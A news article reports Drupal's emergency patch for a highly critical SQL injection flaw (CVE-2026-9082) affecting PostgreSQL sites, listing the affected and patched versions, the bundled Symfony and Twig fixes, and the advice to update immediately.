Drupal Releases Emergency Patch for Critical SQL Injection Flaw (CVE-2026-9082) Affecting PostgreSQL Sites
Drupal released an emergency patch for a highly critical SQL injection vulnerability (CVE-2026-9082) in its database abstraction API, affecting all supported branches and potentially allowing anonymous attackers to execute arbitrary SQL on PostgreSQL sites.
Drupal published an urgent security advisory on May 20, 2026, disclosing a highly critical SQL injection vulnerability (CVE-2026-9082) in its core database abstraction API. The flaw, which carries a CVSS score of 20 out of 25, affects all supported Drupal branches from version 8.9.0 through 11.3.9, though exploitation is limited to sites using PostgreSQL databases. The Drupal Security Team warned that exploit code could be developed within hours or days of the patch release, mirroring the urgency signaled in a pre-advisory notice issued earlier this week.
The vulnerability resides in Drupal's database abstraction layer, which is designed to sanitize queries and prevent SQL injection. A flaw in this API allows an attacker to send specially crafted requests that bypass sanitization, resulting in arbitrary SQL injection on PostgreSQL-backed sites. According to the advisory, this can lead to information disclosure, privilege escalation, remote code execution, or other attacks. Critically, the vulnerability can be exploited by anonymous users, meaning no authentication is required to trigger the flaw.
Drupal has released patched versions for all supported branches: 10.4.10, 10.5.10, 10.6.9, 11.1.10, 11.2.12, and 11.3.10. For end-of-life branches such as Drupal 8.9, 9.x, 10.4.x and earlier, and 11.0.x, the security team has provided best-effort patches, though these unsupported versions remain vulnerable to other previously disclosed issues. The advisory strongly recommends that all site administrators update immediately, regardless of whether they use PostgreSQL, because the release also includes critical upstream security fixes for Symfony and Twig dependencies.
The vulnerability was reported by Michael Maturi and fixed by a team of Drupal Security Team members including Björn Brala, Benji Fisher, catch, Lee Rowlands, Dave Long, and Drew Webber. The coordinated release also bundles security updates for Symfony and Twig, which have released their own advisories. Drupal warned that sites with custom configurations or contrib modules that allow users to update Twig templates—such as via Views—may be at additional risk and should review user role permissions.
This incident follows a pattern of critical SQL injection flaws in widely used content management systems. Earlier in May 2026, CISA added a SQL injection vulnerability in BerriAI LiteLLM to its Known Exploited Vulnerabilities catalog, and SAP patched a critical SQL injection in S/4HANA. The Drupal flaw stands out due to its high severity, anonymous exploitability, and the broad installed base of Drupal—estimated at over 1 million sites worldwide. Administrators are urged to apply patches immediately and monitor for signs of compromise, especially on PostgreSQL-backed deployments.